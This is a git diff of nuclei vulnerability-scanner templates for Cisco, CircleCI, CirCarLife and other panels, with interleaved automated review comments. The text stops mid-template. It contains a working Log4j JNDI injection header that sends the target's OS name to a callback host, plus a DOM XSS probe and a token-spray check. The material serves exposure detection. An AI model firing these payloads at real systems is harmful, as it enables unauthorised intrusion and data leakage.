@@ -1,28 +0,0 @@ -id: circarlife-setup -info: - name: Exposed CirCarLife Setup Page - author: geeknik - description: CirCarLife is an internet-connected electric vehicle charging station - reference: https://circontrol.com/ - severity: critical - tags: scada,circontrorl,circarlife,setup,exposure,panel -requests: - - method: GET - path: - - "{{BaseURL}}/html/setup.html" - matchers-condition: and - matchers: - - type: word - part: header - words: - - "CirCarLife Scada" - - type: word - words: - - "- setup" - - "Network setup" - - "Modem setup" - - "Security setup" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/circleci-config-924.yaml b/nuclei-templates/Other/circleci-config-924.yaml new file mode 100644 index 0000000000..6483134342 --- /dev/null +++ b/nuclei-templates/Other/circleci-config-924.yaml @@ -0,0 +1,26 @@ +id: circleci-config + +info: + name: circleci config.yml exposure + author: geeknik + severity: low + reference: + - https://circleci.com/docs/2.0/sample-config/ + tags: config,exposure,circleci + +requests: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/.circleci/config.yml" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'regex("^version: ", body) && contains(body, "jobs:")' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/circleci-config.yaml b/nuclei-templates/Other/circleci-config.yaml deleted file mode 100644 index 98cf8b37cf..0000000000 --- a/nuclei-templates/Other/circleci-config.yaml +++ /dev/null 
@@ -1,25 +0,0 @@ -id: circleci-config - -info: - name: circleci config.yml exposure - author: geeknik - severity: low - reference: https://circleci.com/docs/2.0/sample-config/ - tags: config,exposure - -requests: - - method: GET - redirects: true - max-redirects: 3 - path: - - "{{BaseURL}}/.circleci/config.yml" - - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'regex("^version: ", body) && contains(body, "jobs:")' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/circleci-ssh-config.yaml b/nuclei-templates/Other/circleci-ssh-config.yaml index 0d19b816b8..3c3d245991 100644 --- a/nuclei-templates/Other/circleci-ssh-config.yaml +++ b/nuclei-templates/Other/circleci-ssh-config.yaml @@ -4,7 +4,7 @@ info: name: circleci ssh-config exposure author: geeknik severity: low - tags: config,exposure,circleci + tags: config,exposure requests: - method: GET diff --git a/nuclei-templates/Other/circleci.yaml b/nuclei-templates/Other/circleci.yaml deleted file mode 100644 index b01e427381..0000000000 --- a/nuclei-templates/Other/circleci.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-circleci - -info: - name: CircleCI API Test - author: zzeitlin - reference: https://circleci.com/docs/api/v1 - severity: info - tags: token-spray,circleci - -self-contained: true -requests: - - method: GET - path: - - "https://circleci.com/api/v1.1/me?circle-token={{token}}" - - matchers: - - type: word - part: body - words: - - '"admin"' - - '"login"' - condition: and diff --git a/nuclei-templates/Other/cisco-ace-device-manager-929.yaml b/nuclei-templates/Other/cisco-ace-device-manager-929.yaml new file mode 100644 index 0000000000..70e4205e76 --- /dev/null +++ b/nuclei-templates/Other/cisco-ace-device-manager-929.yaml 
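Review bot: The `circleci-ssh-config.yaml` hunk removes the `circleci` tag while the neighbouring `circleci-config-924.yaml` added in the same change gains `circleci` in its tags, so the two CircleCI exposure templates end up selectable by different tag sets. Keep `tags: config,exposure,circleci` here so both are found by `-tags circleci`.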
@@ -0,0 +1,25 @@ +id: cisco-ace-device-manager + +info: + name: ACE 4710 Device Manager + author: dhiyaneshDk + severity: info + metadata: + shodan-query: html:"ACE 4710 Device Manager" + tags: panel,cisco + +requests: + - method: GET + path: + - "{{BaseURL}}/index.vm" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "ACE 4710 DM - Login" + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/cisco-ace-device-manager.yaml b/nuclei-templates/Other/cisco-ace-device-manager.yaml deleted file mode 100644 index 09704c579f..0000000000 --- a/nuclei-templates/Other/cisco-ace-device-manager.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: cisco-ace-device-manager - -info: - name: ACE 4710 Device Manager - author: dhiyaneshDk - severity: info - tags: panel,cisco - metadata: - shodan-query: 'html:"ACE 4710 Device Manager"' - -requests: - - method: GET - path: - - "{{BaseURL}}/index.vm" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "ACE 4710 DM - Login" - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/cisco-asa-panel.yaml b/nuclei-templates/Other/cisco-asa-panel-932.yaml similarity index 100% rename from nuclei-templates/Other/cisco-asa-panel.yaml rename to nuclei-templates/Other/cisco-asa-panel-932.yaml diff --git a/nuclei-templates/Other/cisco-cloudcenter-suite-log4j-rce.yaml b/nuclei-templates/Other/cisco-cloudcenter-suite-log4j-rce.yaml new file mode 100644 index 0000000000..af3f889993 --- /dev/null +++ b/nuclei-templates/Other/cisco-cloudcenter-suite-log4j-rce.yaml 
@@ -0,0 +1,63 @@
+id: cisco-cloudcenter-suite-log4j-rce
+
+info:
+ name: Cisco CloudCenter Suite (Log4j)- Remote Code Execution
+ author: pwnhxl
+ severity: critical
+ description: |
+ Cisco CloudCenter Suite is susceptible to remote code execution via the Apache Log4j library. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
+ reference:
+ - https://logging.apache.org/log4j/2.x/security.html
+ - http://www.openwall.com/lists/oss-security/2021/12/10/1
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+ remediation: From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cve-id: CVE-2021-44228
+ cwe-id: CWE-77
+ metadata:
+ fofa-query: title="CloudCenter Suite"
+ shodan-query: title:"CloudCenter Suite"
+ tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev
+
+requests:
+ - raw:
+ - |
+ @timeout: 10s
+ POST /suite-auth/login HTTP/1.1
+ Host: {{Hostname}}
+ Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}}
+ Content-Type: application/json
+
+ {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
+
+ - type: regex
+ part: interactsh_request
+ regex:
+ - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
+
+ - type: word
+ part: header
+ words:
+ - 'X-RateLimit-Limit-suite-gateway_suite-auth'
+
+ extractors:
+ - type: kval
+ kval:
+ - interactsh_ip # Print remote interaction IP in output
+
+ - type: regex
+ part: interactsh_request
+ group: 1
+ regex:
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
+
+# Enhanced by md on 2023/03/22
diff --git a/nuclei-templates/Other/cisco-cloudcenter-suite-rce.yaml b/nuclei-templates/Other/cisco-cloudcenter-suite-rce.yaml
deleted file mode 100644
index 37a4dabf81..0000000000
--- a/nuclei-templates/Other/cisco-cloudcenter-suite-rce.yaml
+++ /dev/null
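Review bot: The interactsh_request matcher regex in the new cisco-cloudcenter-suite-log4j-rce.yaml, `'([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'`, leaves the separator dots unescaped, so each `.` matches any character and the matcher accepts nearly any callback request; the extractor a few lines below escapes them. Aligning the matcher with the extractor, `- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'`, keeps the verdict tied to the hostname layout the Accept header actually produces and reduces false positives from unrelated interactions. The new file also uses the `requests:` key without a `max-request` entry under metadata, whereas the cisco-cloudcenter-suite-rce.yaml being removed carried `http:` and `max-request: 1`; if the mirror is meant to track current nuclei schema, carrying those over is worth considering.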
@@ -1,73 +0,0 @@
-id: cisco-cloudcenter-suite-log4j-rce
-
-info:
- name: Cisco CloudCenter Suite (Log4j) - Remote Code Execution
- author: pwnhxl
- severity: critical
- description: |
- Cisco CloudCenter Suite is susceptible to remote code execution via the Apache Log4j library. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
- remediation: From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
- reference:
- - https://logging.apache.org/log4j/2.x/security.html
- - http://www.openwall.com/lists/oss-security/2021/12/10/1
- - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10
- cve-id: CVE-2021-44228
- cwe-id: CWE-77
- metadata:
- max-request: 1
- shodan-query: title:"CloudCenter Suite"
- fofa-query: title="CloudCenter Suite"
- tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev
-variables:
- rand1: '{{rand_int(111, 999)}}'
- rand2: '{{rand_int(111, 999)}}'
-
-http:
- - raw:
- - |
- @timeout: 10s
- POST /suite-auth/login HTTP/1.1
- Host: {{Hostname}}
- Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}
- Content-Type: application/json
-
- {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"}
-
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - 'X-RateLimit-Limit-suite-gateway_suite-auth'
-
- - type: word
- part: interactsh_protocol # Confirms the DNS Interaction
- words:
- - "dns"
-
- - type: regex
- part: interactsh_request
- regex:
- - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
-
- extractors:
- - type: kval
- kval:
- - interactsh_ip
-
- - type: regex
- part: interactsh_request
- group: 2
- regex:
- - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
-
- - type: regex
- part: interactsh_request
- group: 1
- regex:
- - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
-
-# digest: 4a0a00473045022100c2f5e8163a564e7d2fd0530a85cb7e37e568e017f19c9ed7fa4652e03a0de4c602203859ca9dc699f5dec2304a7611352a5d8889ae7e4a3400870ba2608640d522fa:922c64590222798bb761d5b6d8e72950
diff --git a/nuclei-templates/Other/cisco-edge-340-936.yaml b/nuclei-templates/Other/cisco-edge-340-936.yaml
deleted file mode 100644
index 9ab8a34c07..0000000000
--- a/nuclei-templates/Other/cisco-edge-340-936.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: cisco-edge-340
-info:
- name: Cisco Edge 340
- author: dhiyaneshDk
- severity: info
- metadata:
- shodan-query: http.title:"Cisco Edge 340"
- tags: panel,cisco
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/auth/?next=%2F"
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "Cisco Edge 340"
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/cisco-edge-340.yaml b/nuclei-templates/Other/cisco-edge-340.yaml
new file mode 100644
index 0000000000..17a60b6a18
--- /dev/null
+++ b/nuclei-templates/Other/cisco-edge-340.yaml
@@ -0,0 +1,25 @@
+id: cisco-edge-340
+
+info:
+ name: Cisco Edge 340
+ author: dhiyaneshDk
+ severity: info
+ tags: panel,cisco
+ metadata:
+ shodan-query: 'http.title:"Cisco Edge 340"'
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/auth/?next=%2F"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Cisco Edge 340"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/cisco-finesse-login-938.yaml b/nuclei-templates/Other/cisco-finesse-login-940.yaml
similarity index 100%
rename from nuclei-templates/Other/cisco-finesse-login-938.yaml
rename to nuclei-templates/Other/cisco-finesse-login-940.yaml
diff --git a/nuclei-templates/Other/cisco-integrated-login-941.yaml b/nuclei-templates/Other/cisco-integrated-login.yaml
similarity index 100%
rename from nuclei-templates/Other/cisco-integrated-login-941.yaml
rename to nuclei-templates/Other/cisco-integrated-login.yaml
diff --git a/nuclei-templates/Other/cisco-meraki-exposure-944.yaml b/nuclei-templates/Other/cisco-meraki-exposure-944.yaml
deleted file mode 100644
index d14835d3a6..0000000000
--- a/nuclei-templates/Other/cisco-meraki-exposure-944.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: cisco-meraki-exposure
-
-info:
- name: Cisco Meraki cloud & security Appliances Information Disclosure
- author: dhiyaneshDK,r3naissance
- severity: info
- reference:
- - https://www.exploit-db.com/ghdb/6708
- tags: panel,cisco,meraki,disclosure
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/#connection'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Your client connection'
- - 'This security appliance is directly connected to a local network'
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/cisco-meraki-exposure-946.yaml b/nuclei-templates/Other/cisco-meraki-exposure-946.yaml
new file mode 100644
index 0000000000..112800ebd8
--- /dev/null
+++ b/nuclei-templates/Other/cisco-meraki-exposure-946.yaml
@@ -0,0 +1,25 @@
+id: cisco-meraki-exposure
+
+info:
+ name: Cisco Meraki cloud & security Appliances Information Disclosure
+ author: dhiyaneshDK,r3naissance
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6708
+ tags: panel,cisco,meraki,disclosure
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/#connection'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Your client connection'
+ - 'This security appliance is directly connected to a local network'
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/cisco-network-config-949.yaml b/nuclei-templates/Other/cisco-network-config-949.yaml
deleted file mode 100644
index 04d2a4045e..0000000000
--- a/nuclei-templates/Other/cisco-network-config-949.yaml
+++ /dev/null
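Review bot: The request path `'{{BaseURL}}/#connection'` in the new cisco-meraki-exposure-946.yaml carries a URL fragment, and HTTP clients do not transmit fragments, so the server most likely receives a plain request for `/` and the `#connection` suffix adds nothing to the detection. The same path is in the -944 file being removed, so this is carried over rather than introduced here, but the new file is the one that will keep running. If the root page is the intended target, `- '{{BaseURL}}/'` states that plainly; if a specific resource was meant, the path should name it.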
@@ -1,24 +0,0 @@
-id: cisco-network-config
-
-info:
- name: Cisco System Network Configuration Exposure
- author: DhiyaneshDk
- severity: low
- reference: https://www.exploit-db.com/ghdb/5430
- tags: config,exposure,cisco,network
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/CGI/Java/Serviceability?adapter=device.statistics.configuration"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Network Configuration"
- part: body
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/cisco-network-config-951.yaml b/nuclei-templates/Other/cisco-network-config-951.yaml
new file mode 100644
index 0000000000..0de9a2b420
--- /dev/null
+++ b/nuclei-templates/Other/cisco-network-config-951.yaml
@@ -0,0 +1,25 @@
+id: cisco-network-config
+
+info:
+ name: Cisco System Network Configuration Exposure
+ author: DhiyaneshDk
+ severity: low
+ reference:
+ - https://www.exploit-db.com/ghdb/5430
+ tags: config,exposure,cisco
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/CGI/Java/Serviceability?adapter=device.statistics.configuration"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Network Configuration"
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/cisco-prime-infrastructure.yaml b/nuclei-templates/Other/cisco-prime-infrastructure-954.yaml
similarity index 100%
rename from nuclei-templates/Other/cisco-prime-infrastructure.yaml
rename to nuclei-templates/Other/cisco-prime-infrastructure-954.yaml
diff --git a/nuclei-templates/Other/cisco-secure-desktop-960.yaml b/nuclei-templates/Other/cisco-secure-desktop-962.yaml
similarity index 100%
rename from nuclei-templates/Other/cisco-secure-desktop-960.yaml
rename to nuclei-templates/Other/cisco-secure-desktop-962.yaml
diff --git a/nuclei-templates/Other/cisco-sendgrid-967.yaml b/nuclei-templates/Other/cisco-sendgrid-967.yaml
deleted file mode 100644
index d9708bf9f3..0000000000
--- a/nuclei-templates/Other/cisco-sendgrid-967.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: cisco-sendgrid
-
-info:
- name: Cisco ServiceGrid
- author: dhiyaneshDK
- severity: info
- reference: https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22
- tags: panel,cisco
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/pages/sdcall/Login.jsp'
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - '(?m)^Cisco ServiceGrid (.*)<\/title>$'
-
- - type: status
- status:
- - 200
-
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - '<div class="top\-margin">Version ([0-9.]+)<\/div>'
diff --git a/nuclei-templates/Other/cisco-sendgrid-969.yaml b/nuclei-templates/Other/cisco-sendgrid-969.yaml
new file mode 100644
index 0000000000..7148f305d0
--- /dev/null
+++ b/nuclei-templates/Other/cisco-sendgrid-969.yaml
@@ -0,0 +1,31 @@
+id: cisco-sendgrid
+
+info:
+ name: Cisco ServiceGrid
+ author: dhiyaneshDK
+ severity: info
+ reference:
+ - https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22
+ tags: panel,cisco
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/pages/sdcall/Login.jsp'
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^<title>Cisco ServiceGrid (.*)<\/title>$'
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - '<div class="top\-margin">Version ([0-9.]+)<\/div>'
diff --git a/nuclei-templates/Other/cisco-smi-exposure-972.yaml b/nuclei-templates/Other/cisco-smi-exposure-972.yaml
deleted file mode 100644
index c5a6584dd8..0000000000
--- a/nuclei-templates/Other/cisco-smi-exposure-972.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: cisco-smi-exposure
-
-info:
- name: Cisco Smart Install Endpoints Exposure
- author: dwisiswant0
- severity: info
- description: Cisco Smart Install endpoints were discovered. Exposure of SMI to untrusted networks could allow complete compromise of the switch.
- reference:
- - https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html
- - https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature
- - https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi
- - https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py#L52-L53
- - https://github.com/Sab0tag3d/SIET
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- cvss-score: 5.3
- cwe-id: CWE-200
- tags: network,cisco,smi,exposure
-
-network:
- - inputs:
- - data: "000000010000000100000004000000080000000100000000"
- type: hex
-
- host:
- - "{{Hostname}}"
- - "{{Host}}:4786"
-
- matchers:
- - type: word
- encoding: hex
- words:
- - "000000040000000000000003000000080000000100000000"
-
-# Enhanced by mp on 2022/03/30
diff --git a/nuclei-templates/Other/cisco-smi-exposure.yaml b/nuclei-templates/Other/cisco-smi-exposure.yaml
new file mode 100644
index 0000000000..212bbf0f1b
--- /dev/null
+++ b/nuclei-templates/Other/cisco-smi-exposure.yaml
@@ -0,0 +1,33 @@
+id: cisco-smi-exposure
+
+info:
+ name: Cisco Smart Install Endpoints Exposure
+ author: dwisiswant0
+ severity: info
+ description: |
+ This template attempts & supports the detection part only by
+ connecting to the specified Cisco Smart Install port and determines
+ if it speaks the Smart Install Protocol. Exposure of SMI to
+ untrusted networks can allow complete compromise of the switch.
+ reference:
+ - https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html
+ - https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature
+ - https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi
+ - https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py#L52-L53
+ - https://github.com/Sab0tag3d/SIET
+ tags: network,cisco,smi,exposure
+
+network:
+ - inputs:
+ - data: "000000010000000100000004000000080000000100000000"
+ type: hex
+
+ host:
+ - "{{Hostname}}"
+ - "{{Hostname}}:4786"
+
+ matchers:
+ - type: word
+ encoding: hex
+ words:
+ - "000000040000000000000003000000080000000100000000"
diff --git a/nuclei-templates/Other/cisco-systems-login-973.yaml b/nuclei-templates/Other/cisco-systems-login-973.yaml
new file mode 100644
index 0000000000..96ae7b9ee4
--- /dev/null
+++ b/nuclei-templates/Other/cisco-systems-login-973.yaml
@@ -0,0 +1,32 @@
+id: cisco-systems-login
+
+info:
+ name: Cisco Systems Login
+ author: dhiyaneshDk,idealphase
+ severity: info
+ metadata:
+ shodan-query: http.title:"Cisco Systems Login"
+ google-query: intitle:"Cisco Systems Login"
+ tags: panel,cisco
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Cisco Systems Login"
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ group: 1
+ regex:
+ - '<script src="javascript\/translate\.js\?ver=(.+)"><\/script>'
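Review bot: The second host entry in the new cisco-smi-exposure.yaml, `- "{{Hostname}}:4786"`, appends a port to `{{Hostname}}`, which nuclei documents as the host including any port given in the input, so an input that already names a port would be expanded to something like `host:4786:4786` and the fallback probe would never connect; the -972 file being removed used `- "{{Host}}:4786"` for exactly this case. Restoring `{{Host}}` on that line keeps the fallback usable. The new file also drops the `classification` block (cvss-metrics, cvss-score, cwe-id) that the -972 version carried under info; if that metadata was intentional, it should be re-added so reporting and filtering on severity data keeps working.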
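Review bot: The body matcher in cisco-systems-login-973.yaml now looks for the bare string `"Cisco Systems Login"` where the cisco-systems-login.yaml removed in the next hunk matched `"<TITLE>Cisco Systems Login"`, so any page that merely mentions the phrase in a link or help text will be reported as the panel; keeping the title prefix in the word keeps the check anchored. The version extractor's `(.+)` is greedy and will run to the last `"` on the matched line, so when other attributes follow `ver=` the captured value is polluted; `([^"]+)` captures only the query value. Both points apply to the new file only, which is the one that stays in the repository.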
diff --git a/nuclei-templates/Other/cisco-systems-login.yaml b/nuclei-templates/Other/cisco-systems-login.yaml
deleted file mode 100644
index 25607b3bbf..0000000000
--- a/nuclei-templates/Other/cisco-systems-login.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: cisco-systems-login
-
-info:
- name: Cisco Systems Login
- author: dhiyaneshDk
- severity: info
- tags: panel,cisco
- metadata:
- shodan-query: 'http.title:"Cisco Systems Login"'
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}"
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "<TITLE>Cisco Systems Login"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/cisco-telepresence.yaml b/nuclei-templates/Other/cisco-telepresence.yaml
index adc3eca85a..93a3d7423f 100644
--- a/nuclei-templates/Other/cisco-telepresence.yaml
+++ b/nuclei-templates/Other/cisco-telepresence.yaml
@@ -4,9 +4,9 @@ info: name: Cisco Telepresence author: dhiyaneshDk severity: info - tags: panel,cisco metadata: - shodan-query: 'http.title:"Cisco Telepresence"' + shodan-query: http.title:"Cisco Telepresence" + tags: panel,cisco requests: - method: GET
diff --git a/nuclei-templates/Other/citrix-vpn-detect-987.yaml b/nuclei-templates/Other/citrix-vpn-detect-987.yaml
index 51248b8c91..96c7e2071e 100644
--- a/nuclei-templates/Other/citrix-vpn-detect-987.yaml
+++ b/nuclei-templates/Other/citrix-vpn-detect-987.yaml
@@ -2,9 +2,8 @@ id: citrix-vpn-detect info: name: Citrix VPN Detection - author: pdteam + author: bauthard severity: info - tags: panel,citrix requests: - method: GET
diff --git a/nuclei-templates/Other/ckan-dom-based-xss-992.yaml b/nuclei-templates/Other/ckan-dom-based-xss-992.yaml
deleted file mode 100644
index 7cc02f4bf3..0000000000
--- a/nuclei-templates/Other/ckan-dom-based-xss-992.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: ckan-dom-based-xss
-
-info:
- name: CKAN DOM Based XSS
- author: dhiyaneshDk
- severity: medium
- description: CKAN uses the old jQuery Sparkle library which is vulnerable to DOM Based XSS.
- reference:
- - https://github.com/ckan/ckan/blob/b9e45e2723d4abd70fa72b16ec4a0bebc795c56b/ckan/public/base/javascript/view-filters.js#L27
- tags: dom,xss
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/?{alert(1)}'
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - '